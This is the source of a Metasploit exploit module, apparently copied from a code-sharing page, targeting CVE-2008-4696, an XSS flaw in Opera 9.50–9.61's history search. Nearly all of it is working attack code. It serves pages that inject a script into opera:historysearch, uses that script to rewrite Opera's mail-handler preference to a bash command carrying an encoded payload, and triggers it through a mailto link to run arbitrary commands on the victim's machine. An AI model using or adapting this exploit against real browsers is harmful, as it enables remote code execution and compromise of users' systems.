Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  #include Msf::Exploit::Remote::BrowserAutopwn
12
  #autopwn_info({
13
  #  :ua_name    => HttpClients::OPERA,
14
  #  :javascript => true,
15
  #  :rank       => ExcellentRanking, # reliable command execution
16
  #  :vuln_test  => %Q{
17
  #    v = parseFloat(opera.version());
18
  #    if (9.5 < v && 9.62 > v) {
19
  #      is_vuln = true;
20
  #    }
21
  #  },
22
  #})
23

24
  def initialize(info = {})
25
    super(update_info(info,
26
      'Name'           => 'Opera historysearch XSS',
27
      'Description'    => %q{
28
          Certain constructs are not escaped correctly by Opera's History
29
        Search results.  These can be used to inject scripts into the
30
        page, which can then be used to modify configuration settings
31
        and execute arbitrary commands.  Affects Opera versions between
32
        9.50 and 9.61.
33
      },
34
      'License'        => BSD_LICENSE,
35
      'Author'         =>
36
        [
37
          'Roberto Suggi', # Discovered the vulnerability
38
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
39
          'egypt',  # msf module
40
        ],
41
      'References'     =>
42
        [
43
          ['CVE',    '2008-4696'],
44
          ['OSVDB',  '49472'],
45
          ['BID',    '31869'],
46
          ['URL',    'http://www.opera.com/support/kb/view/903/'],
47
        ],
48
      'Payload'        =>
49
        {
50
          'EXITFUNC' => 'process',
51
          'Space'    => 4000,
52
          'DisableNops' => true,
53
          'BadChars' => "\x09\x0a\x0d\x20",
54
          'Compat'      =>
55
            {
56
              'PayloadType' => 'cmd',
57
              'RequiredCmd' => 'generic perl ruby telnet',
58
            }
59
        },
60
      'Platform'       => %w{ unix },
61
      'Targets'        =>
62
        [
63
          #[ 'Automatic', {  } ],
64
          #[ 'Opera < 9.61 Windows',
65
          #	{
66
          #		'Platform' => 'win',
67
          #		'Arch' => ARCH_X86,
68
          #	}
69
          #],
70
          [ 'Opera < 9.61 Unix Cmd',
71
            {
72
              'Platform' => 'unix',
73
              'Arch' => ARCH_CMD,
74
            }
75
          ],
76
        ],
77
      'DisclosureDate' => '2008-10-23', # Date of full-disclosure post showing code exec
78
      'DefaultTarget'  => 0
79
      ))
80
  end
81

82
  def on_request_uri(cli, request)
83

84
    headers = {}
85
    html_hdr = %Q^
86
      <html>
87
      <head>
88
      <title>Loading</title>
89
      ^
90
    html_ftr = %Q^
91
      </head>
92
      <body >
93
      <h1>Loading</h1>
94
      </body></html>
95
      ^
96

97
    case request.uri
98
    when /[?]jspayload/
99
      p = regenerate_payload(cli)
100
      if (p.nil?)
101
        send_not_found(cli)
102
        return
103
      end
104
      # We're going to run this through unescape(), so make sure
105
      # everything is encoded
106
      penc = Rex::Text.to_hex(p.encoded, "%")
107
      content =
108
        %Q{
109
          var s = document.createElement("iframe");
110

111
          s.src="opera:config";
112
          s.id="config_window";
113
          document.body.appendChild(s);
114
          config_window.eval(
115
            "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
116
            "old_app = opera.getPreference('Mail','External Application');" +
117
            "old_handler = opera.getPreference('Mail','Handler');" +
118
            "opera.setPreference('Mail','External Application',cmd);" +
119
            "opera.setPreference('Mail','Handler','2');" +
120
            "app_link = document.createElement('a');" +
121
            "app_link.setAttribute('href', 'mailto:[email protected]');" +
122
            "app_link.click();" +
123
            "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
124
            "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
125
          "");
126
          setTimeout(function () {window.location='about:blank'},1);
127
        }
128

129
    when /[?]history/
130
      js = %Q^
131
        window.onload = function() {
132
          location.href = "opera:historysearch?q=*";
133
        }
134
        ^
135
      content = %Q^
136
        #{html_hdr}
137
        <script><!--
138
        #{js}
139
        //--></script>
140
        #{html_ftr}
141
        ^
142
    when get_resource()
143
      print_status("Sending #{self.name} for request #{request.uri}")
144

145
      js = %Q^
146
        if (window.opera) {
147
          var wnd = window;
148
          while (wnd.parent != wnd) {
149
            wnd = wnd.parent;
150
          }
151
          url = location.href;
152
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
153
        }
154
        ^
155
      content = %Q^
156
        #{html_hdr}
157
        <script><!--
158
        #{js}
159
        //--></script>
160
        #{html_ftr}
161
        ^
162
    else
163
      print_status("Sending 404 for request #{request.uri}")
164
      send_not_found(cli)
165
      return
166
    end
167
    content.gsub!(/^ {8}/, '')
168
    content.gsub!(/\t/, ' ')
169

170
    send_response_html(cli, content, headers)
171
    handler(cli)
172
  end
173
end
174

175